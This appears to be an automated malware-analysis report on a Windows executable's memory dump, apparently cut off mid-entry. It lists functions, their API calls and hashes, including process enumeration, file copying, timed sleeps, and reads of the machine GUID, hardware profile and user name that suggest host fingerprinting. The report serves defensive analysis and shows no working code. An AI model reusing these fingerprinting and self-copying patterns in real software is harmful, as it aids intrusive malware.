Instruction ID: 7e5dc5d702286ff7eeeb34c5da44b000f0a5838b87907b751394f6e59b14d481
Opcode Fuzzy Hash: e5687809fe058a09f8a30b7deeb532a6d16df8250235ae735f37a1f5285ee616
Instruction Fuzzy Hash: 2A218DB1504710AFCB20DF65D985A57BBF8FF84704B14892FE58687A01FA78F904CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004616AB, Relevance: 4.5, APIs: 3, Instructions: 44COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 004616D6
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004616F0
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 004616F6

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: fec090b2c73558134462985a25251da8dd622ccc2d6353d43ecaa109f91e5f3d
Instruction ID: e614bf7158e19449fc286036f1a85feeeb3993df36046ab7a2c1016a9562973b
Opcode Fuzzy Hash: fec090b2c73558134462985a25251da8dd622ccc2d6353d43ecaa109f91e5f3d
Instruction Fuzzy Hash: 0201A27160020CAFD710EF68DC84DAEBBBCEB45748F00447EF185D7240DAB49E888BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00465B15, Relevance: 4.5, APIs: 3, Instructions: 42fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,004662B8,?,C:\Users\,0040AFDE,?,00000001,00000000,?,?), ref: 00465B3C
CloseHandle.KERNEL32(?,00000001,?,?,00000000,004662B8,?,C:\Users\,0040AFDE,?,00000001,00000000,?,?), ref: 00465B53
CloseHandle.KERNEL32(?,00000001,?,?,00000000,004662B8,?,C:\Users\,0040AFDE,?,00000001,00000000,?,?), ref: 00465B65

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 0f30a43ee4375dea68cdcf623b185f968058d9e68017a0d952f2ef9038cc8b33
Instruction ID: 4151a1582b03b734edca451e12cb30280c128eae9445182ac3d9c397e7a88907
Opcode Fuzzy Hash: 0f30a43ee4375dea68cdcf623b185f968058d9e68017a0d952f2ef9038cc8b33
Instruction Fuzzy Hash: 9CF06D71A05B444FC7309FA99C80827FBD8AB06611B08897FD18AC3700E675F8448F19

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB5B, Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040DB82
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DB9E
CloseHandle.KERNEL32(00000000), ref: 0040DBA5

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: db052aed866fc49fa48d311194b5377ffa9f929f84bfeaede6320286ba0869f0
Instruction ID: 50ffc64a0e1edf6209753fab437857da183437fdc713fb4b4f9585b25886c2e8
Opcode Fuzzy Hash: db052aed866fc49fa48d311194b5377ffa9f929f84bfeaede6320286ba0869f0
Instruction Fuzzy Hash: AAF0BB72500304BBD7305F65DC48F67BABCEF86B71F104A3AF606A5194D271B945C768

Uniqueness

Uniqueness Score: -1.00%

Function 0040D34F, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 449COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040D356

Part of subcall function 0040326C: std::_Xinvalid_argument.LIBCPMT ref: 00403286

Part of subcall function 0040CEAC: __EH_prolog3.LIBCMT ref: 0040CECB
Part of subcall function 0040CEAC: __wgetenv.LIBCMT ref: 0040CF08

Part of subcall function 0040CEAC: CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,00000001,00000000,00000001,00000000,00000000), ref: 0040D129

Part of subcall function 0040CEAC: CopyFileW.KERNEL32(00000000,?,00000001,?,00000000), ref: 0040D242

Part of subcall function 0040CD8C: CreateDirectoryA.KERNEL32(?,00000000), ref: 0040CDBE

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

(, xrefs: 0040D961

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectoryH_prolog3$CopyFileXinvalid_argument__wgetenv_memmovestd::_
String ID: (
API String ID: 948702957-3887548279
Opcode ID: 3562ddf1546ab578de69f5524938aa2e8102ef14bbea5f86fd8d16765dc88462
Instruction ID: bc4c177d4bdcb12a5e6d9aa6f6a669bd2d2ed84e9a651239416cd8c821f003b5
Opcode Fuzzy Hash: 3562ddf1546ab578de69f5524938aa2e8102ef14bbea5f86fd8d16765dc88462
Instruction Fuzzy Hash: 61023270D05284EACF01BBBEC91716C7E75AB66304F5441BEE40127692DEBE0B1897EB

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9F6, Relevance: 3.8, APIs: 3, Instructions: 23sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000214), ref: 0040CA07
Sleep.KERNEL32(00000285), ref: 0040CA19
Sleep.KERNEL32(000001DC), ref: 0040CA2B

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f6534a6415d60cb5095f9fad5d11c38104f23c49d5310d161ebf52d413f4bf0d
Instruction ID: 157268666819dda10042423afb61292614c62912a09f0c4728d0bdf19d17359a
Opcode Fuzzy Hash: f6534a6415d60cb5095f9fad5d11c38104f23c49d5310d161ebf52d413f4bf0d
Instruction Fuzzy Hash: 63E01A32B51248EFDB40DFA8E94D69C77B0EB01B02F1048B6E502F21C0D7708B05AB25

Uniqueness

Uniqueness Score: -1.00%

Function 00413D67, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00413D6E

Strings

b>A, xrefs: 00413DB1

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3
String ID: b>A
API String ID: 431132790-4094471207
Opcode ID: 2e8421fc1208da64ebdafc45894692b072e69ed983a8ef4cb98176b2f1920910
Instruction ID: 7dbbd9e80553c64a4419b40bb94cdaf3da263b313658046fe3c933bba2ff40d0
Opcode Fuzzy Hash: 2e8421fc1208da64ebdafc45894692b072e69ed983a8ef4cb98176b2f1920910
Instruction Fuzzy Hash: A5112E706002049FDB10EF59C985AAEBBE5BF44344F54485EF4469B251CBB4EA818B99

Uniqueness

Uniqueness Score: -1.00%

Function 004031A3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004031B2

Part of subcall function 00466492: std::exception::exception.LIBCMT ref: 004664A7
Part of subcall function 00466492: __CxxThrowException@8.LIBCMT ref: 004664BC
Part of subcall function 00466492: std::exception::exception.LIBCMT ref: 004664CD

Strings

string too long, xrefs: 004031AD

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: string too long
API String ID: 1823113695-2556327735
Opcode ID: 02270d166f5240c28fe36f483dd090b4a64d1d260bcbc40c0c7c8055001f94eb
Instruction ID: 0925546d52ee7bd6ab8e8f6c03025d11312490e2419636c23e1c0a328e780988
Opcode Fuzzy Hash: 02270d166f5240c28fe36f483dd090b4a64d1d260bcbc40c0c7c8055001f94eb
Instruction Fuzzy Hash: D6F0C8306042205EDB14BE284C4146A3E496B5A319B214D7BF4A1FF1C2D77ACE82579E

Uniqueness

Uniqueness Score: -1.00%

Function 0045ED55, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0045ED79

Strings

Unknown, xrefs: 0045ED97

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: 3c33b70ed4376f9ee22122efa2d4491e8644306d64efc8e7d7020f8625e54449
Instruction ID: 648822408bb7de51779cb388c41a3eea227319543535b6700f643c5e9ac70690
Opcode Fuzzy Hash: 3c33b70ed4376f9ee22122efa2d4491e8644306d64efc8e7d7020f8625e54449
Instruction Fuzzy Hash: 52F0967060030E9FCB10DF659C4059ABBF8EB08348F00447F9541D7241DA74AE088BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00431C24, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00431C28

Part of subcall function 0046949E: __FF_MSGBANNER.LIBCMT ref: 004694B7
Part of subcall function 0046949E: __NMSG_WRITE.LIBCMT ref: 004694BE
Part of subcall function 0046949E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004694E3

Strings

failed to allocate %u bytes of memory, xrefs: 00431C38

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID: failed to allocate %u bytes of memory
API String ID: 501242067-1168259600
Opcode ID: fdc1be5b37461f03dfe191a79123e67ded48d7b195605e7d8e88e4cd1f67a6d9
Instruction ID: 7d5f281072aa9fc6d1d229093362901ed782b1dda358f127ee1ed544bc62dd18
Opcode Fuzzy Hash: fdc1be5b37461f03dfe191a79123e67ded48d7b195605e7d8e88e4cd1f67a6d9
Instruction Fuzzy Hash: 61C01233A4C23167D6222255FC0265E77509B457A0F11482AFA4855265DA695C61038B

Uniqueness

Uniqueness Score: -1.00%

Function 00402FD3, Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00402FDA
_memmove.LIBCMT ref: 00403070

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3_catch_memmove
String ID:
API String ID: 3914490576-0
Opcode ID: 2d5d30e7ef494da25c39c746c3ef41aa9aecc2780fb985d5ddf5fa19a1bdcf78
Instruction ID: b19b9339b81822e5c9ae6ec3b76913d4bc88423bd0df98bfcf191241bf8c859b
Opcode Fuzzy Hash: 2d5d30e7ef494da25c39c746c3ef41aa9aecc2780fb985d5ddf5fa19a1bdcf78
Instruction Fuzzy Hash: 5F11E431B052019BEB24DF29C94176E7BA6AF84710F20462FE405AB2C5CBB5AE41C799

Uniqueness

Uniqueness Score: -1.00%

Function 0046483D, Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0046486F
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004648A7

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead_memmove
String ID:
API String ID: 1325644223-0
Opcode ID: 3cce50dceae1aa74fd6439ca546d8fb43395ef55550b9a1fd0500472fcd58ec6
Instruction ID: 96e658e1209574dea9db3a3f8e20a8502ea41c8967b46568b2f4301c623645e3
Opcode Fuzzy Hash: 3cce50dceae1aa74fd6439ca546d8fb43395ef55550b9a1fd0500472fcd58ec6
Instruction Fuzzy Hash: 01118276600644ABDB21AF65CC04A9B7BE6FF84750F00881EF95987510E631E914CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00465096, Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,00465D54,?,?), ref: 004650D8

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7b876b5a667ac166cc00e06eaf0bb7693e9fd7b8935ec00bbe4c19e3b8d9390b
Instruction ID: 332fa60c5fe0b08c83aea98836a3c228c6d6e1f0753598811112c48aa6a67316
Opcode Fuzzy Hash: 7b876b5a667ac166cc00e06eaf0bb7693e9fd7b8935ec00bbe4c19e3b8d9390b
Instruction Fuzzy Hash: 0D01B171604B04AFD3215F398C84BA7BAD8F746314F10493FF2A692251E67558409B16

Uniqueness

Uniqueness Score: -1.00%

Function 004682E8, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 0046DC1D: __getptd_noexit.LIBCMT ref: 0046DC1D

__lock_file.LIBCMT ref: 0046832F

Part of subcall function 0046A353: __lock.LIBCMT ref: 0046A378

__fclose_nolock.LIBCMT ref: 0046833A

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 088cebdf76918fb0ba66e49a77d64d8043e6a61487218aea8f75b3c6246e9ba1
Instruction ID: fe42d62ebaf6ee97b01b499402ee8af75dfb697eaac23938935278cff4daf6a9
Opcode Fuzzy Hash: 088cebdf76918fb0ba66e49a77d64d8043e6a61487218aea8f75b3c6246e9ba1
Instruction Fuzzy Hash: A8F096318017159ADB10AB76C81275F7BA06F01738F20874EA874AA2D1EF7D8A429F5F

Uniqueness

Uniqueness Score: -1.00%

Function 004717C3, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 004717DB

Part of subcall function 00472A09: __mtinitlocknum.LIBCMT ref: 00472A1F
Part of subcall function 00472A09: __amsg_exit.LIBCMT ref: 00472A2B
Part of subcall function 00472A09: EnterCriticalSection.KERNEL32(00000000,00000000,?,004701CA,0000000D), ref: 00472A33

__tzset_nolock.LIBCMT ref: 004717EC

Part of subcall function 004710E2: __lock.LIBCMT ref: 00471104
Part of subcall function 004710E2: ____lc_codepage_func.LIBCMT ref: 0047114B
Part of subcall function 004710E2: __getenv_helper_nolock.LIBCMT ref: 0047116D
Part of subcall function 004710E2: _free.LIBCMT ref: 004711A4
Part of subcall function 004710E2: _strlen.LIBCMT ref: 004711AB
Part of subcall function 004710E2: __malloc_crt.LIBCMT ref: 004711B2
Part of subcall function 004710E2: _strlen.LIBCMT ref: 004711C8
Part of subcall function 004710E2: _strcpy_s.LIBCMT ref: 004711D6
Part of subcall function 004710E2: __invoke_watson.LIBCMT ref: 004711EB
Part of subcall function 004710E2: _free.LIBCMT ref: 004711FA

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: 125bb9abb0f7830946337bb4f7af05fc461ea74480cd6033aa82731b8fd69a96
Instruction ID: dd5ecdc8fd21c7ee7ccd794098a64a212babc6b9e42129f4dd7de9563aa5c882
Opcode Fuzzy Hash: 125bb9abb0f7830946337bb4f7af05fc461ea74480cd6033aa82731b8fd69a96
Instruction Fuzzy Hash: 03E0C2348812509FCF62FBFBAA0278E71646B14B26F20857FB008115E2E9B80941866F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E824, Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 0040E827

Part of subcall function 00466B6C: __EH_prolog3.LIBCMT ref: 00466B73
Part of subcall function 00466B6C: std::_Lockit::_Lockit.LIBCPMT ref: 00466B89
Part of subcall function 00466B6C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00466BAB
Part of subcall function 00466B6C: std::locale::_Setgloballocale.LIBCPMT ref: 00466BB5
Part of subcall function 00466B6C: _Yarn.LIBCPMT ref: 00466BCB
Part of subcall function 00466B6C: std::locale::facet::_Incref.LIBCPMT ref: 00466BD8

std::locale::facet::_Incref.LIBCPMT ref: 0040E835

Part of subcall function 0040E7F5: std::_Lockit::_Lockit.LIBCPMT ref: 0040E801

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::locale::_$IncrefLockitLockit::_std::_std::locale::facet::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn
String ID:
API String ID: 2389631691-0
Opcode ID: 42432ce89f2671f8c035c59d1b2cb2485b475ff8260ddd9d722ac8e410d57383
Instruction ID: d169a2634b13c12968bce6bbc9b17cc6a041a619efa8a0a972f232a00ab7a7fe
Opcode Fuzzy Hash: 42432ce89f2671f8c035c59d1b2cb2485b475ff8260ddd9d722ac8e410d57383
Instruction Fuzzy Hash: D2B09265B1023082CE243BBB740648865D84E42B183020C7FB581DB28AFD7DCC41038D

Uniqueness

Uniqueness Score: -1.00%

Function 00439E43, Relevance: 1.8, APIs: 1, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043A0D0

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 143a946d4e1c3027835c9ba1712ea402e4d93ececef6d9a53aeebd294f10cb7b
Instruction ID: a352b675be3c85485bcef34640a4a61f26e1af088cb6765c7283f0c51df9b38a
Opcode Fuzzy Hash: 143a946d4e1c3027835c9ba1712ea402e4d93ececef6d9a53aeebd294f10cb7b
Instruction Fuzzy Hash: CB91D071900616EFDB29DF64C881AAFB3B4BF08314F14512BF855A7341D778AD608BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0044F7A2, Relevance: 1.7, APIs: 1, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675c3f73524ac53dde2a154faf2db46c5fd5c82c3aec0ab12a4424c7e771b61b
Instruction ID: 019664674d38cdfa40b1b2d17baace3ce23b13dafafed176114b85920f0c8fb2
Opcode Fuzzy Hash: 675c3f73524ac53dde2a154faf2db46c5fd5c82c3aec0ab12a4424c7e771b61b
Instruction Fuzzy Hash: ED71D771900205AFEB11AF69D881AAE77B4AF44358F24417FF801AB351DB38DE858B99

Uniqueness

Uniqueness Score: -1.00%

Function 00403DBF, Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00403E8C

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 103cdeb71153bf3969fa7b693a22b856e4c53fb651d95be16030ef541b460cd9
Instruction ID: c26bf15aabc19ed8862159314b8a397f938992ff5a86d3aec1916238bc942b69
Opcode Fuzzy Hash: 103cdeb71153bf3969fa7b693a22b856e4c53fb651d95be16030ef541b460cd9
Instruction Fuzzy Hash: 4C614874200B018FC725CF2DC680A26BBF9BF99314B244A6EE9869BB90D775FD01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004619DA, Relevance: 1.7, APIs: 1, Instructions: 158COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00461B33

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: swprintf
String ID:
API String ID: 233258989-0
Opcode ID: 1f124f9d903d13b4af7eecbb89e77ea5fbe996886b9634914658d0689bcf543c
Instruction ID: 4e900e86f930733c935cbc9b698082a78d40380f489c10f1deb3a0b4a47aeaa6
Opcode Fuzzy Hash: 1f124f9d903d13b4af7eecbb89e77ea5fbe996886b9634914658d0689bcf543c
Instruction Fuzzy Hash: 47510672E01309AADF11DFD4D9417DE7BB8EB04754F28451BE841A12B1F6394C448F9A

Uniqueness

Uniqueness Score: -1.00%

Function 004112B7, Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004112BE

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3_catch
String ID:
API String ID: 3886170330-0
Opcode ID: 6d507978d76be651d147215f0223ea58964a9ef0240e90b3ece86f361f7b2c5a
Instruction ID: 29efb7229962573f3b3d838c7e3fe6beb8cdb622a331072f5b6591bbf2394ffa
Opcode Fuzzy Hash: 6d507978d76be651d147215f0223ea58964a9ef0240e90b3ece86f361f7b2c5a
Instruction Fuzzy Hash: E7518E34A00249CFEB20CF59C544AEEBBF0AF08324F14425ED961A77A1D738DA81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004259AA, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 0042407E: _memset.LIBCMT ref: 0042409D

_memset.LIBCMT ref: 004259DA

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: d523acd82d013499d492a5d827290778fb406204d7f75fcb7997390555ed7f1e
Instruction ID: 36e18700b11a96c44ac54dc1a6f4bec4940797c81675ff4bca1e59dfce1b7db2
Opcode Fuzzy Hash: d523acd82d013499d492a5d827290778fb406204d7f75fcb7997390555ed7f1e
Instruction Fuzzy Hash: 80317070B007149FDB20DF29D84279E7BE4EB08764F40861EF859E7380E778E8408B99

Uniqueness

Uniqueness Score: -1.00%

Function 0045EEE9, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0045EF08

Part of subcall function 0045ED55: GetCurrentHwProfileA.ADVAPI32(?), ref: 0045ED79

Part of subcall function 0045EDB3: _memset.LIBCMT ref: 0045EDF5
Part of subcall function 0045EDB3: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00000000), ref: 0045EE11
Part of subcall function 0045EDB3: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,?,00000000), ref: 0045EE30
Part of subcall function 0045EDB3: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0045EE39
Part of subcall function 0045EDB3: CharToOemA.USER32(?,?), ref: 0045EE4A

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$CharCloseCurrentH_prolog3OpenProfileQueryValue_memset
String ID:
API String ID: 577691565-0
Opcode ID: 3f8e34f21e2991cab1d540d95d3e53f9081ee7804f8c1732feaa87e1ce63987b
Instruction ID: 558178a07cf669222216c3f630919828ba152484d29c37e65c7891f33e58c0e0
Opcode Fuzzy Hash: 3f8e34f21e2991cab1d540d95d3e53f9081ee7804f8c1732feaa87e1ce63987b
Instruction Fuzzy Hash: 973166B1904149AFDB14EFA9DD41BEE77F8AF54304F00402EB945A32C1DB785A08DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004037D6, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00403833

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: ab36e6f4ab90ee361d66642bd4b02389fbd9e487fb2532dee904df2288008ef7
Instruction ID: d016d930968017330f793f57179b01f90fad726d132969aa1e1bad2b3ec969d6
Opcode Fuzzy Hash: ab36e6f4ab90ee361d66642bd4b02389fbd9e487fb2532dee904df2288008ef7
Instruction Fuzzy Hash: 06311C72900209EFCB50DF59C84459A7BF8FF0432AF14C2ABF814A7291D3789A50CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004767C6, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0046BFC8,00000000,?,00000000,00000000,00000000,?,0047025F,00000001,00000214), ref: 00476809

Part of subcall function 0046DC1D: __getptd_noexit.LIBCMT ref: 0046DC1D

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: d68266206670853559c239951daa7b59a10b5375985d87069325e1beb12e9d2c
Instruction ID: 3f4a16f55fa8b7f98a17343bfadde7c9632cb0f24e1314f490cf1078d33f6b1c
Opcode Fuzzy Hash: d68266206670853559c239951daa7b59a10b5375985d87069325e1beb12e9d2c
Instruction Fuzzy Hash: C901F531202A159BEB28AF26DC14BEB3756AB91764F07C53FAC19DA290C738DC00C649

Uniqueness

Uniqueness Score: -1.00%

Function 004651E8, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004651EF

Part of subcall function 00467CC1: _malloc.LIBCMT ref: 00467CDB

Part of subcall function 00467CC1: std::exception::exception.LIBCMT ref: 00467D10
Part of subcall function 00467CC1: std::exception::exception.LIBCMT ref: 00467D2A
Part of subcall function 00467CC1: __CxxThrowException@8.LIBCMT ref: 00467D3B

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8H_prolog3Throw_malloc
String ID:
API String ID: 2311266369-0
Opcode ID: 701b02db9b6c0ba43fea1054c05d6d024fc6407a55ba9f00557eb7bd279880ed
Instruction ID: 840cbc6cc2710e8c2a1c1e2bcf6a8c5d0816eb4c63f0b73919a2be2fba52e2ad
Opcode Fuzzy Hash: 701b02db9b6c0ba43fea1054c05d6d024fc6407a55ba9f00557eb7bd279880ed
Instruction Fuzzy Hash: 5501D6706046119BDF157F66992265E3A50AF40318F00815FB9155B3D2EF7C8D019A9F

Uniqueness

Uniqueness Score: -1.00%

Function 00467C4A, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: ee123ca314030bff14ba191e18914ed3c2a5c27ca24ba2e47a51c4dd00281e90
Instruction ID: f64f08467d76b9f299a675a3c80a90701c10917d95d6ec6429e5c1a6e3ed8435
Opcode Fuzzy Hash: ee123ca314030bff14ba191e18914ed3c2a5c27ca24ba2e47a51c4dd00281e90
Instruction Fuzzy Hash: 33F0A4319046689ADF112FA5DC01B9B3B949F5173CF14024BF938562D1F7BD8490DBAB

Uniqueness

Uniqueness Score: -1.00%

Function 004110B8, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004110BF

Part of subcall function 0040FDEA: std::locale::facet::_Incref.LIBCPMT ref: 0040FDFD

Part of subcall function 00410E91: __EH_prolog3.LIBCMT ref: 00410E98
Part of subcall function 00410E91: std::_Lockit::_Lockit.LIBCPMT ref: 00410EA2
Part of subcall function 00410E91: int.LIBCPMT ref: 00410EB9
Part of subcall function 00410E91: std::locale::_Getfacet.LIBCPMT ref: 00410EC2

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3$GetfacetIncrefLockitLockit::_std::_std::locale::_std::locale::facet::_
String ID:
API String ID: 199253227-0
Opcode ID: ae2f4df0d8604804da0774eaefcdf2f12641d97f2a69c8496de3075059ea371b
Instruction ID: b540ab02654e72e620fc268284bd186115c4a03f69c9f5fecdcc291c23764ef7
Opcode Fuzzy Hash: ae2f4df0d8604804da0774eaefcdf2f12641d97f2a69c8496de3075059ea371b
Instruction Fuzzy Hash: 50F0BE31600208ABCF15BB72CC16BEE73596F08708F00042FBA00A61E2EFBDCE958759

Uniqueness

Uniqueness Score: -1.00%

Function 0045F3B7, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0045F3EC

Memory Dump Source

